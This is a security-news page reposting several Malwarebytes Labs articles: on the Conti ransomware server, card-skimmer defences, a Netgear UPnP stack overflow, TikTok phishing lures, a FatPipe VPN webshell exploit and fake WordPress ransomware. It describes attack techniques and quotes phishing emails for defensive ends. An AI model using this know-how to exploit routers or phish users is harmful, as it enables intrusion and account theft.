IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Security researchers play peek-a-boo with Conti ransomware server

It’s not been a great time for ransomware authors recently. Well, some ransomware authors at any rate. While many are making huge amounts of money from their device-locking antics, it’s not a profession without risk. Every so often something can and does go wrong, and ransomware groups get into all manner of trouble. Sometimes they aim too high and generate a huge amount of heat. At that point, the solution is to go into hiding or claim to be leaving the business forever.

Elsewhere, it can be a case of accidentally leaking the decryption key, or making it so that third parties can figure it out.

Sometimes, an incident is just a disaster from start to finish.

Setting the scene

Conti ransomware is perhaps most well known for its use in the HSE healthcare attacks back in May. More than 80,000 endpoints were shut down and the health service had to revert to the pen and paper approach. Providers in the US and New Zealand were also affected.

Conti is created and distributed by “Wizard Spider”, a group which also created the well-known Ryuk ransomware. Conti, offered to affiliates as Ransomware as a Service, ran wild in the first quarter of 2021. RDP brute forcing, phishing, and hardware / software vulnerabilities are the chosen methods for Conti compromise.

Where it gets interesting is that Conti directs victims to Dark Web “support portals” where they talk through the steps to unlocking impacted devices. This is where the current Conti issues have arisen.

A lack of support

Security firm Prodaft discovered a vulnerability in the servers Conti uses for recovery. Essentially, the place they tell victims to go. They discovered the real IP address of the hidden service and were able to monitor network traffic for connections to the server. This is particularly ironic considering the slightly confusing stance on free keys, which still come with a ransom attached. There was also a flurry of news recently when word dropped that they were selling access to victims.

All in all, having access to a support portal swiped is probably not high on the Conti gang’s list of “cool things to have happen”.

Down for the count?

Once word broke that a security firm accessed the server for more than a month, the people behind the ransomware scrambled to fix things. What this meant in practice, is a support portal missing in action, and no way for victims to pay.

In total, the Conti infrastructure here was mostly offline for something like two days. This sounds great in practice. However, it’s worth noting that while the ransomware edifice has temporarily toppled, individuals and organisations affected couldn’t communicate with the attackers. If they decided to pay, they wouldn’t be able to. If they wanted to appeal to their better nature, it’s not a possibility.

To add to this sense of uncertainty, the victims would have no way of knowing if the people responsible for their locked files would even come back. They could have simply cut their losses.

Not a great time to be compromised by ransomware, and that’s taking into account that there’s never a great time to be compromised by ransomware.

An increasingly creaky comeback?

Conti has now, of course, returned with a combative air of defiance:

This isn’t the first thing to go wrong for them recently, however. In August, an ex-pentester for Conti decided to spill several gallons worth of beans on Conti activities. This individual, unhappy with the money they were making, dumped files allegedly handed to affiliates on a forum. Rival factions go to war with one another all the time, but it’s still somewhat unusual to see insider documents posted quite like this.

Still, despite the wheels coming off, it doesn’t seem to stop ransomware groups for long. There’s simply too much money at stake and (probable) decent odds against getting caught by law enforcement. In the game of ransomware whack-a-mole, the mole is most definitely king.

The post Security researchers play peek-a-boo with Conti ransomware server appeared first on Malwarebytes Labs.

How to defend your website against card skimmers

Black Friday and the holiday season are approaching, and shoppers are forecast to spend record amounts again this year. Retail websites big and small can expect a lot of interest from shoppers looking for deals, and a lot of interest from cybercriminals looking to cash in on those shoppers, by stealing their credit card details with stealthy card skimmers.

Card skimmers, or web skimmers, are pieces of malicious software that criminals piggyback on to legitimate websites, so they can steal shoppers’ credit card details. The skimmers read the details as users type them into the sites’ payment forms, or replace the payment forms with convincing fakes. Attackers have even been seen adding entire checkout pages to sites that don’t take payments. Skimmers can steal card details in real time, as they are typed, even before the victim clicks “submit” on the payment form.

Skimmers allow criminal hackers to silently rob every customer that makes a purchase on an infected website, until they are discovered and removed. Malwarebytes products detect card skimmers, and our Threat Intelligence team tracks and investigates them. We know that card skimming activity tends to increase inline with busy shopping days, and shop owners need to be extra-vigilant heading in to the holiday season.

card skimmer
A payment form created by a card skimmer and a real payment form side by side. Can you spot the fake? The answer is at the end of the aritcle*.

In this article we will explain the basic steps you should take to secure your website against card skimmers. Getting these basics right will also protect your website against a range of other cyberthreats too.

But before we look at how to secure your site, let’s look at why you should, if you’re only running a small mom-and-pop shop.

Why you aren’t too small to get hacked

If you think your website is too small to be of interest to cybercriminals, think again. They don’t care how small your site is. Really. In fact, they don’t care about you at all and may never even look at your website.

Cybercriminals don’t break into websites one by one, using their best guess to figure out your password like they do in the movies. They use computer programs to scan the Internet for vulnerable websites. There are millions of vulnerable websites out there, and scanning the entire Internet to find them is fast, cheap, and easy.

When they find a site they can break into, they inject a card skimmer, automatically.

Their objective is to break into thousands of websites at a time and the process is automated and can run continuously. It effectively costs criminals nothing to break into even the smallest website, so every website—no matter how small—is an attractive target.

Websites without a payment form can be still be targeted, or monetised in other ways, so even if your site doesn’t sell anything, it is still at risk.

Securing your website

With an Internet full of potential targets to choose from, you don’t have to do much to make your website less attractive to attackers. As the old saying goes, you don’t have to outrun the bear that’s chasing you, you just have to outrun the other people running away from the bear!

So, how do you move a little faster than the others?

Step 0, keep your computer secure

The first step in keeping your website secure is to make sure that your computer, and computers belonging to anyone else who administers the site, are secure. If your computer has malware on it, it doesn’t matter how secure your website is, because criminals can just steal your password or login in to your website from your computer, pretending to be you.

Keep your software up to date with security fixes, and install a modern antivirus solution, a password manager, and a securiity plugin for your browser, like BrowserGuard.

Set strong passwords. Never share them, never reuse them

One of the easiest ways to break into a website is to guess an administrator password for the software that runs the website—its Content Management System (CMS). If an attacker can do that, they can do anything they like to the website, including adding a card skimmer and dismantling any defences you have.

Just as they don’t search for websites manually, attackers don’t guess passwords manually either. They have computer programs for that too. And once their scanner finds your website, another computer program will happily plug away 24/7, trying to guess your password. They will move on eventually, but they may have made thousands of attempts before they do.

The good news is that you can seriously sharpen up your password game by avoiding a few bad habits:

  • Bad passwords. Cybercrooks don’t guess passwords randomly, they use lists of popular passwords. The ten thousand most common passwords are full of easy-to-type sequences like 123456, 1111, and qwertyuiop, or they are made from names and common words like monkey, michael or trustno1. If your password is on that list, or looks like the passwords on that list, your website is in trouble.
  • Shared passwords. If you share a password with somebody you have no idea if they are storing it securely, or who they might be sharing it with. The only way to ensure passwords stay secret is to never share them. Give everyone their own account, with their own password, and tell them not to share.
  • Passwords you’ve used elsewhere. Alongside common passwords, criminals also use lists of usernames and passwords exposed in data breaches (this is called credential stuffing). Chances are you’ve lost at least one password in a data breach. If you never use the same password twice, you can’t be caught by credential stuffing.
  • Everyone’s an admin. It’s often convenient to give everyone who works on a site an administrator account, so their work isn’t interrupted by being denied access to something. But every separate administrator login gives criminals another potential way in. Save administrator-level access for the people that need it, and aim for the smallest number of administrators you can get away with.

You can get to grips with most of these bad habits by adding two-factor authentication (2FA) to your site. 2FA forces users to provide another piece of information with their password when they log in, such as a one-time code from an app. Any decent website CMS will have a 2FA option built in, or 2FA plugins that are easy to find and install.

If your company uses a Virtual Private Network (VPN) to provide secure, remote access to company systems, you could limit access to your website login screen to company VPN users too.

Keep website software up to date, every day

Another easy way to break into a website is by exploiting a software vulnerability in the web server, CMS, or plugins your website uses. A vulnerability is a coding flaw that lets attackers do things they aren’t supposed to be able to do, such as adding files to your website, or accessing its back end without logging in. When software vendors find vulnerabilities in their software they provide a security patch that fixes the problem.

Your website is only secure against that problem when you apply the patch.

Criminals often reverse enginer patches to find out what vulnerabilities they fix, and then attempt to use those vulnerabilities to break in to websites that haven’t been patched yet. They can do this extremely quickly.

In 2014, Drupal, a very popular CMS, released an update for a serious security flaw. Criminals reverse engineered the update and were using it to take over websites within hours. Later, the Drupal security team made the extraordinary announcement that if you hadn’t updated your website within seven hours of the patch being released then you should “consider it likely your site was already compromised”.

Make sure you know whose job it is to keep the website patched. This may be something that the people who built and maintain your website will do for you, or a job you need to do yourself. Whatever you do, don’t just assume that somebody else must doing it.

If you use WordPress, it should update itself automatically with security fixes. You can check this by logging in and going to Dashboard > Updates. Note however, that WordPress will not update most plugins automatically. Vulnerabilities in plugins are common, and probably the biggest threat to your website, so if nothing else, you will need to make a point of logging in regularly to check for and apply plugin updates.

The same is true for other CMSes: You should log in regularly to see if there are updates that need to be applied. We suggest you also go to your CMS vendor’s website (and any plugin vendor’s sites too) and see if they have a mailing list where they announce patches. Sign yourself up so you are alerted if anything urgent needs your attention.

Finally, this advice applies to every website under your control. It is quite common for companies to run a number of websites on the same server. These could be different websites for different purposes, or test and staging versions of your principal site. If any one of those websites is compromised, it gives attackers a potential route to cross-contaminate all the other sites on the server. Test and staging sites are often neglected, and often exposed to the Internet accidentally, making them a particularly soft underbelly.

Use a Web Application Firewall (WAF)

A Web Application Firewall (WAF) is an appliance or Cloud-based service that filters the data that’s sent to your website, weeding out things that look malicious, such as XSS or SQLi attacks. They can also prevent unauthorized data (like credit card details from a server-side skimmer) from leaving your website if it is compromised.

WAFs use a rulebook to recognize malicious or unauthorized inputs and outputs, which means they can often provide protection far sooner than patching. All a WAF vendor needs to know to create a new rule is what input the attackers are using to compromise websites. To create a patch, a vendor needs to know what input the attackers are using, but also how that input affects their software, and how to fix it without breaking anything.

WAFs add complexity to your environment and may require regular updates, but they provide a useful extra layer of defence for your website. You should never use a WAF as an alternative to patching, but using one could save you if you miss a patch, are too slow to apply one, or if attackers are using a zero-day technique that your CMS or plugin vendor hasn’t patched yet.

Protecting users from rogue dependencies

Web pages are typically made up of multiple separate elements, such as scripts, images, like buttons, sharing widgets, and so on, drawn from multiple different places. In fact it is not uncommon for individual pages to have tens or even hundreds of such dependencies, and for them to be drawn from many different domains: Analytics and advertising code from Google perhaps, a Tweet button from Twitter, images pulled from a Content Delivery Network (CDN), and so on.

The different elements are only assembled into a single page at the last minute when it’s viewed in a web browser, and that process is repeated in each user’s machine, each time the page is viewed.

Each dependency is a potential backdoor into your web pages. If an attacker can compromise a site hosting one of your dependencies, they can use it to inject a card skimmer into your page when it is assembled by a web browser, without ever compromising your website. You can’t control the passwords or patching on the sites you depend on, so instead you must take steps to protect your users from compromised dependencies.

Subresource integrity

Subresource integrity is a form of tamper protection for scripts and stylesheets. If an attacker compromises a third-party script your website relies on, they can use it to inject a card skimmer into your pages.

In June 2019, Malwarebytes Threat Intelligence discovered exactly this kind of attack on the official Washington Wizards page of the NBA.com website. Attackers had managed to alter a script the site used that was hosted on an Amazon S3 storage website.

Subresource integrity protects against this kind of attack by using fingerprints (cryptographic hashes) to verify that elements loaded by <script> or <link> tags haven’t been altered.

For example, let’s say your website uses version 3.6 of the popular jQuery JavaScript library. Without Subresource Integrity, the script tag for it would look like this:

<script src="https://code.jquery.com/jquery-3.6.0.js">

With Subresource Integrity, the script tag looks like this:

<script src="https://code.jquery.com/jquery-3.6.0.js" integrity="sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk=" crossorigin="anonymous">

When a browser assembles your page it will download the jQuery code and create its own cryptographic fingerprint from it, and match it against the fingerprint in the tag. If the fingerprints don’t match, the browser will assume the jQuery code has been compromised and won’t run it.

Content Security Policy

Sometimes, instead of changing an existing dependency, attackers can find enough leverage to add a new dependency to your site, from a website they control.

Content Security Policy (CSP) is a simple addition to your website that can protect against this form of attack. It works by sending web browsers a list of the domain names your website trusts, and what it trusts them to do.

For example, let’s say your website is example.com, and your website includes Google Analytics code, which is loaded from the analytics.google.com domain. Your CSP header would say you trust your own site to provide all forms of content, and it trusts Google Analytics to provide scripts, and nothing else. The actual instruction looks like this:

Content-Security-Policy: default-src 'self'; script-src analytics.google.com

If a cybercriminal sneaks a card skimming script on to your site that’s loaded from example.xyz, web browsers will refuse to run the card skimmer. So, even though your website has been compromised, it will not affect your users.

CSP isn’t perfect. In a serious hack, an attacker might gain enough access to your site to remove the CSP instructions altogether, but in many situations they won’t.

You can see if your website already has a CSP header (and other useful security headers too) by checking it on securityheaders.com.

Pulling it all together

Securing your site and its dependencies against attack are vitally important, but sometimes you don’t realise you’re vulnerable until it’s too late, or your Subresource Integrity and CSP silently block a rogue dependency and you don’t ever learn about it

In both cases you want something that tells you as soon as the problem starts. So the last step in securing your site is to use a third-party integrity monitoring service that sees your site from your users’ point of view. These services can find card skimmers that slip through the net and, most importantly, tell you that there’s something you need to fix.

Automated integrity checking services are like users that work on your behalf, periodically visiting important web pages, like your checkout, pulling in all the dependencies in real time, looking for anything that shouldn’t be there, and alerting you if they find anything.

Although we have gone into a lot of depth in this article, keeping websites secure is mostly a matter of setting up a few services, and then doing a some simple things, over and over again. By making these things a habit, you will strengthen your site enormously against card skimmers and other attacks, and keep your users safe through the holiday season and beyond.

* The fake checkout is on the left.

The post How to defend your website against card skimmers appeared first on Malwarebytes Labs.

The Internet is not safe enough for women, and Sue Krautbauer has some ideas about why: Lock and Code S02E22

Decades ago, the promise of the Internet was clear: No one, depending on their age, gender, race, income, or place of birth, would be unwelcome from expressing their thoughts and ideas.

Today, that promise has been largely unfulfilled. As Malwarebytes discovered earlier this year, the Internet is a deeply unequal place for women, teenagers, and Black communities, Indigenous populations, and people of color. Women, above all demographics, told us that they felt both the least safe and the least private online, and when we looked at why that might be, the answers were obvious. Women face higher rates of cyberstalking. Women are almost singularly targeted by nonconsensual pornography. Women who are stuck in situations of domestic abuse are also reportedly more frequently impacted by the threats of stalkerware. Women also, as we learned, reported higher rates of receiving text messages from unknown phone numbers, and having their social media accounts hacked.

These are all the outcomes of an unfair Internet. On today’s Lock and Code podcast, with host David Ruiz, we dig into why so many real-life problems have followed women onto the Internet today.

Part of the problem, according to our guest Sue Krautbauer, is that the Internet has created tremendous latitude for bad actors to commit harms and then get away without a trace.

“It almost feels a bit like online guerilla warfare, right? Where they come in, and they lob something into the internet, and then they disappear again. And that can just have such an emotional and a mental toll on the victims because they can’t point to them and say it’s that person or that thing.”

Sue Krautbauer, senior director of strategy and development for Digitunity

Today, on the Lock and Code podcast, we speak with Sue Krautbauer, senior director of strategy and development for Digitunity, about the different—often worse—experiences that women face online, how pervasive such treatment can be, and why our Internet so often mirrors our real-life situations.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

You can also find us on Apple PodcastsSpotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post The Internet is not safe enough for women, and Sue Krautbauer has some ideas about why: Lock and Code S02E22 appeared first on Malwarebytes Labs.

Malwarebytes CrackMe – contest summary

On October 29 we published our third CrackMe Challenge and announced two parallel tracks for the contest: “The fastest solve” , and “The best write-up“.

In the first category (“The fastest solve” ), we got three winners already the first weekend following publication. Big congratulations to:

🥇 @nazywam

🥈 Suvaditya Sur (@x0r19x91)

🥉 @evandrix

Yet, even those of you who are not as fast could still join in the fun, and get a chance to win a prize in the second category. Submissions for the best writeup closed November 12 (two weeks after the Crackme publication). In this post we will summarize the writeups that we received, and announce the winner for the best writeup!

Hall of fame

The submissions were treated as valid if they contained the following flag:

flag{you_got_this_best_of_luck_in_reversing_and_beware_of_red_herrings}

We received them in the following order:

  1. 🥇 @nazywam
  2. 🥈 Suvaditya Sur (@x0r19x91)
  3. 🥉 @evandrix
  4. 🎊 Alex Skalozub (@pieceofsummer)
  5. 🎊 @JLeow00
  6. 🎊 rainbowpigeon
  7. 🎊 arm4nd0
  8. 🎊 Matthieu Walter (@matth_walter)
  9. 🎊 Bahlai Vladyslav (@BaglaiVlad) & Alex Shevchuk
  10. 🎊 @kasua02
  11. 🎊 @zvikam

Congratulations to all the solvers!

CrackMe 3 challenge

Before we present you with the writeups, let’s have a quick look at the task itself.

The CrackMe was composed of multiple components:

  • The GUI application (written in .NET): responsible for taking the input, and verifying it / passing it to the further layers. It was accepting 3 passwords for the consecutive levels.
  • The server: a native application, packed. Responsible for verifying the input of the passwords for the stages 2 and 3. Communicating with the GUI application with the help of a named pipe, and a local TCP server.
  • The DLL injector (written in .NET, loaded into the main application with the help of .NET Reflection)
  • The hooking DLL: a native application, injected into the server and hooking some of the used APIs, changing the password verification function.
crackme overview

It is worth to note that each level of the CrackMe depends on the previous one, so the passwords have to be provided in the right order.

To make the analysis easier, and more approachable for beginners, the code (apart from the loader part) was not obfuscated. Some components were based on public code, or contained debug strings making it easier to follow.

Level 1:

In the first level, the user was supposed to input the password that would let the second stage get properly decoded and run as a new process. The second stage of the crackme was a PE, steganographically hidden in the image that was displayed in the GUI, and obfuscated by XOR with a static key. The key could be cracked with the help of plaintext attack.

Level 2:

The second password inserted by the user was sent over the pipe to the previously deployed server. The user was supposed to unpack the core of the server, and analyze it. First, it was required to notice that the presence of certain analysis tools cause the crackme to exit. Then, the user needed to find out that the expected password is in reality the name of one of those analysis tools. The next step was finding a public list of suspected tools, and cracking the password by a dictionary attack.

The correct password was not only clearing the level, but also triggering the decryption of the hooking DLL, that was injected in the server.

Level 3:

The third password inserted by the user was sent over the local TCP connection to the previously deployed server.

The user was supposed to notice that the hooking DLL alters the behavior of the verification function. With this information, the actual flow of the verification function should be reconstructed. Then it was possible to crack the final password.

Techniques covered:

  1. Steganography
  2. Packed executable (loader with self-injection of the payload)
  3. Shellcodified PE
  4. Loading functions by hashes (API hashing)
  5. Basic anti-analysis tricks
  6. Vectored Exception Handling (VEH)
  7. Inline hooking
  8. Inter-process communication
  9. .NET Reflection
  10. Classic DLL injection

List of writeups

We received 6 writeups in total, from the following contestants:

Scoring the writeups

As we mentioned in the contest opening:

The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as provide the explanation of the techniques used in the challenge

Just like in the previous edition, in order to introduce some objective measures, several categories were used to assign points.

  • The quality of the solution:

There are no wrong solutions if they lead to the goal. However, some approaches are faster and more elegant than others. We ranked higher the solutions that are straight to the point and not over-engineered. If multiple solutions were presented in a single writeup, we appreciated if the author stated which of them is the most optimal, and why.

  • An in-depth explanation of the inner workings of the CrackMe, guiding through the process of solving. This means writers should have:
  1. Explained how to approach the CrackMe: presented an overview of the task as a whole
  2. Explained each stage of the CrackMe: the main logic, relationship to the other levels
  3. Identified and described each executable layer the stage was composed of (loaders, shellcodes, etc.)
  4. Identified each algorithm used (i.e. CRC32, RC4)
  5. Identified and explained each technique used (from the list “techniques covered”)
  6. Explained the third verification function before and after hooking, presented what each hook is responsible for, and how it changes the logic

An educational value of the writeup. Writers should have:

  1. Introduced tools before they were used, showing the environment setup
  2. Provided detailed explanation of the used techniques, reaching beyond the CrackMe itself. For example, providing links where the reader can learn more.
  3. Described the solution in a comprehensive way, that can be followed by a beginner
  4. If applicable, presented different approaches, and explanation which of them is the recommended one and why
  5. Provided graphical illustrations making the provided explanation easier to follow. Diagrams, GIFs, videos, etc.
  6. Been especially clear and had a pleasant writing style

You could also get some bonus points for OSINT if you found:

  1. The header of the payload in the stage 2 was shellcodified with the help of pe_to_shellcode
  2. The hashes in the stage 2 were based on the list from the Al-Khasher project
  3. The function checking the processes was copied from the repo: antianalysis_demos
  4. The hooking DLL was created with the help of MS Detours, and based on the following template

The writeup contest results

All 6 solutions turn out to be of very high quality, so it was extremely hard to select winners. Even trying to introduce some objective criteria for judging writeups, all authors covered most of the points that we would like to see described, and the margin between the scores was small. That’s why we decided to reward all of them with Malwarebytes swag.

Additionally, we decided to distinct three, most comprehensive solutions, that will be rewarded with the main prize (an IT-related book of contestant’s choice):

  • rainbowpigeon [ writeup ] – clear explanation of the stages, elegance and simplicity of the taken approaches
  • Matthieu Walter (@matth_walter) [ writeup ] – detailed explanation of each level, easy to follow even for a person who didn’t solve the crackme themselves
  • Leow00 [ writeup ] – for the efforts to provide an educational value: detailed explanations, diagrams

All the authors will be contacted soon!

Once again thank you for participation, and hopefully see you again next year!

The post Malwarebytes CrackMe – contest summary appeared first on Malwarebytes Labs.

Update now! Netgear vulnerability patched

Netgear has released a fix for a vulnerability on several of their product models. The affected product models include extenders, routers, air cards, and modems.

The vulnerability was discovered by researchers at GRIMM, but prior to the planned disclosure date, Netgear released a patch that fixed the underlying bug in one of the affected devices.

The vulnerability

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed under CVE-2021-34991 and described as a vulnerability that allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6400v2 1.0.4.106_10.0.80 routers. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the UPnP service, which listens on TCP port 5000 by default. When parsing the universally unique identifier (uuid) request header, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root.

The vulnerability received a CVSS score of 8.8 out of 10 because of some limiting factors. One consolation in the above is that the attacker already has to be inside the LAN to perform this attack. But once they are, the attacker can send a specially crafted header to the UPnP daemon and can remotely run code with root privileges on the affected device.

Another limiting factor for the attacker lies in the fact that the copy function which overflows the stack is a string copy. As such, it will stop copying characters when it encounters a NULL character. Thus, the exploit cannot include gadgets with NULL bytes. All of the addresses within the UPnPd daemon contain a NULL character as the Most Significant Byte (MSB). But, the researchers that discovered this vulnerability created a Proof-of-Concept (PoC) which bypasses this limitation by omitting the gadget’s MSB in the payload, and then immediately ends the payload. The string copy which overflows the stack will automatically NULL terminate the string, and thus write a single NULL byte. However, this technique has the disadvantage that it can only write a single NULL byte at the end of the payload. As such, the exploit can only run a single gadget via this technique.

UPnP

Universal Plug and Play (UPnP) is a set of networking protocols that permits networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points, and mobile devices to seamlessly discover each other’s presence on the network and establish functional network services. By design, the daemon accepts unauthorized requests of clients that want to receive updates when the UPnP configuration of the network changes. For example, the Xbox One uses UPnP to configure port forwarding necessary for gameplay.

The eternal dilemma

UPnP is a convenient way of allowing gadgets to find other devices on your network and, if necessary, modify your router to allow for device access from outside of your network. A UPnP client can obtain the external IP address of your network and add new port forwarding mappings as part of its setup process.

This is extremely convenient from a consumer perspective as it makes it a lot easier to set up new devices. Unfortunately, with this convenience have come multiple vulnerabilities and large-scale attacks which have exploited UPnP.

Very often, security issues arise from the developers’ inclination to make things easier for their users. It seems there is an impossible to find balance between security and ease of use. It should not be so hard to make secure the default, and if the user wants to increase the ease of use then there should be an option to do so temporarily. Why would you have to open the floodgates permanently just to let one boat in?

Affected devices

This list will not be inclusive because some organizations, and ISPs in particular, have a habit of rebranding routers and other network equipment. But a list of product models and the required firmware version can be found in the Netgear security advisory.

How to make sure you are safe

Netgear strongly recommends that you download the latest firmware as soon as possible.

  1. Visit Netgear Support.
  2. Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears. If you do not see a drop-down menu, make sure that you enter your model number correctly, or select a product category to browse for your product model.
  3. Click Downloads.
  4. Under Current Versions, select the first download that begins with Firmware Version.
  5. Click Release Notes.
  6. Follow the instructions in the firmware release notes to download and install the new firmware.

For cable products, new firmware is released by your Internet service provider after NETGEAR releases it to them. Firmware fixes for the following cable products have been released to all service providers:

  • CAX80

Stay safe, everyone!

The post Update now! Netgear vulnerability patched appeared first on Malwarebytes Labs.

Phishers target TikTok influencers with verification promises and copyright threats

Influencers on TikTok are feeling the pinch of scams and phishing thanks to targeted campaigns hungry for fresh logins.

The phishing campaigns make use of much older tactics seen across multiple platforms down the years. It’s a one-two combo of “Do this quickly, or else something bad will happen”, combined with the the lure of increased social status for someone’s social media accounts. Shall we take a look?

“Support – copyright” mails go for the panic approach

People don’t want to lose their account due to accidental (or even deliberate) copyright infringement. Social media has a weird knife-edge of appearing to be a free for all, while routinely dinging accounts for copyright. Most platforms operate a sort of “three strikes and you’re out” policy. In this case, the scammers (who include a special kind of phishing link in the mail – more on this later) don’t waste any time:

Hi dear user,

Your account violates our copyright. Your account will be deleted from copyright within 48 hours, will not be re-entered if you think this is an error and you do not want your account deleted please reply to this email with “Confirm my account”. Copyright is very important to us. If necessary actions are not taken from our connection, you will be removed from our servers within 48 hours. Please do not change your password while your account is being examined.

There’s a veritable word salad bulging out of every other sentence. I’ve highlighted the important part in bold. They don’t want victims changing logins until they’ve taken full control of the account. This is a well worn tactic in 419 style scams, where the perpetrator warns the victim that whatever they’ve promised them will take a few days to happen. Definitely don’t tell anyone, or change details, or do anything else. They claim they’re taking care of it behind the scenes. In reality, they’re just stealing the account safe in the knowledge the victim is busy doing nothing to prevent this happening.

Verification woes

Getting a verification stamp on your social media profile is seen as a “special” form of status. We’ve seen years of scams along these lines for Twitter, where the promise of getting a checkmark results in account theft or even monetary loss.

It’s much the same thing here:

Hi dear user,

The account caught our attention and we examined the account. We saw that he shared his own original content. We offer the right to receive a verified badge for your account.

To get a verified badge for your account, you must identify that you are the real owner of the account. We will give you a form to verify that you are the true owner of the account.

To receive the verification form for your account, reply to this email by typing “verify my account”.

This is even more of a word salad than the original mail, but people still fall for it. You’re probably wondering what the “special kind of phishing link in the mail” is all about, right? Well, I’m glad you asked…

The special kind of phishing link in the mail

Scams like this typically send you to a phishing page. It might be well designed, it could be a mess, but a phishing page you shall have.

Not this one, however. They’re trying something a little fresher.

Scammers are wising up to the fact that folks may be using additional forms of authentication to protect their accounts. An easy way for them to combat this is to direct victims to WhatsApp chat rooms instead. From there, they can start asking for phone numbers, email addresses and (importantly) the 6 digit 2FA code sent to the mobile.

While the victim waits in chat, the scammers are busy punching in the login and 2FA code to hijack their account in real time. At the moment, it seems nobody knows for sure if the idea here is eventual extortion, a bit of “fun” trolling, selling the accounts on, or something else altogether. But whether your account is geared towards influencing or you just use TikTok for fun, it pays to lock things down and make use of TikTok’s security settings.

TikTok users are popular targets for people up to no good. You don’t want the hassle of trying to recover stolen accounts via customer support, especially as many organisations continue to be impacted thanks to the pandemic. Be cautious, have fun, and keep those accounts free from harm.

The post Phishers target TikTok influencers with verification promises and copyright threats appeared first on Malwarebytes Labs.

Patch now! FatPipe VPN zero-day actively exploited

According to its marketing team, a FatPipe MPVPN can make your VPN “900% more secure.” Well, I don’t know about that, but I do know a way to make your MPVPN admin console 100% more secure, and that you should do so right away, by installing the latest version of its software.

Why? Because older versions of the device software used by FatPipe’s MPVPN, WARP, and IPVPN products, are all vunerable to a serious zero-day exploit that has been actively exploited in the wild for at least six months. FatPipe advises that versions 10.1.2r60p93 and 10.2.2r44p1 of its software, or later, are the ones you need.

If you are unable to update immediately, FatPipe recommends you cut off access to your admin console from the Internet at large: “disable UI access on all the WAN interfaces or configure Access Lists on the interface page to allow access only from trusted sources.”

The vulnerability

Like a lot of security and administration software, FatPipe’s MPVPN is configured and controlled through a web-based administration portal, which is just another way of saying “website”.

FatPipe describes the vulnerability in its software’s administration website as a “lack of input and validation checking mechanisms for certain HTTP requests”. It goes on to say “an attacker could exploit this vulnerability by sending a modified HTTP request to the affected device”.

That simple POST request could “allow a remote attacker to upload a file to any location on the filesystem on an affected device.” But FatPipe says could, and the FBI says did. According to the agency, a recent forensic analysis has revealed that Advanced Persistent Threat (APT) actors (plural) have been abusing the flaw since May 2021.

Input validation is website security 101, and the attack as described by the FBI is very simple. The Persistent Threat groups that carried out the attacks may have been be Advanced, but the exploit they used was not.

The exploitation

The FBI says that “The vulnerability allowed APT actors to gain access to an unrestricted file upload function to drop a webshell for exploitation activity with root access, leading to elevated privileges and potential follow-on activity.”

There’s a lot going on in that one sentence. Let’s break down what it means:

The FBI says the APT groups gained access to an “unrestricted file upload function,” meaning that the attackers were able to add files to a server running the admin console for some FatPipe software. Attackers should obviously not be able to simply add their files to your servers.

For this attack to work, the APT actors only needed to add one file: A web shell, at /fpui/img/1.jsp. A web shell is a type of malicious script that turns an attacker’s ability to add a file to your server into an ability to do whatever they want on your server. The attackers simply send the web shell the commands they’d like your machine to run, and it runs them.

The shell can only run with whatever restricted permissions it inherits from the web server it’s added to, but in this case it seems as if there were no restrictions. The FBI’s description suggests that the web shell enjoyed root-level (administrator) access from the get go.

Free to do whatever they wanted with their web shells, the attackers opted to overwrite the machines’ Secure Shell (SSH) configuration, so they could use the same method of remote access as the machine’s legitimate administrators. The FBI says the APT groups then used the compromised FatPipe servers as bridgeheads to “route malicious traffic through the device and target additional U.S. infrastructure”.

If you want to check your system for signs of exploitation, the FBI alert contains a full list of Indicators of Compromise (IoCs). It also notes that the APT actors were careful to clean up after themselves, and so the agency would love to hear from you if you can add anything to its understanding of these attacks.

What is going on with security admin software?

It is a shock, but not a surprise, to read about an easily exploited flaw in an Internet-facing administration console for a security product in 2021. A shock because the whys and wherefores of securing websites—and the central importance of treating any kind of input as hostile unless proven otherwise—has been very well understood for decades. But it’s not a surprise because criminals exploiting basic flaws like authentication bypasses or input validation errors in security products like VPNs has been a running theme for several years now.

In a recent episode of Malwarebyte’s Lock and Code podcast, host David Ruiz interviewed Victor Gevers, chair of the Dutch Institute for Vulnerability Disclosure (DIVD), about July’s enormous Kaseya ransomware attack. Gevers explains that his team had been racing against time to get several zero-day vulnerabilities in Kaseya VSA fixed at the time of the attack, and that one of those zero-days was in fact used by the ransomware gang.

Gevers also revealed that the problems his team discovered in Kaseya VSA were not unusual. The vulnerabilities were uncovered during a much broader investigation which revealed a worrying trend—that Internet-facing remote administration tools are rife with flaws.

You can learn more about what Gevers and his team discovered in the podcast episode below.

This video cannot be displayed because your Functional Cookies are currently disabled.

To enable them, please visit our privacy policy and search for the Cookies section. Select “Click Here” to open the Privacy Preference Center and select “Functional Cookies” in the menu. You can switch the tab back to “Active” or disable by moving the tab to “Inactive.” Click “Save Settings.”

The post Patch now! FatPipe VPN zero-day actively exploited appeared first on Malwarebytes Labs.

Fake ransomware warnings hit WordPress sites: How to stay safe

A ransomware warning has appeared out of nowhere and started taking over WordPress sites.

The warning, with its black background and red writing, says:

“SITE ENCRYPTED

{ Countdown }

FOR RESTORE SEND 0.1 BITCOIN:

[address redacted]

(create file on site /unlock.txt with transaction key inside)”

Ransomed website

But there’s just one thing… the warning is a fake. There is no ransomware.

The ransomware that isn’t what it claims to be

The warning is clearly intended to scare the site owner into paying the 0.1 Bitcoin ransom amount, which amounts to roughly $6,000 at the time of writing. The countdown clock adds to the intimidation.

Researchers at Sucuri found and analyzed the fake ransomware. When they performed an on-site scan for a file that contained the bitcoin address, they found that the ransomware alert was merely an HTML page that displays the notice and a PHP script that accounts for the timer.

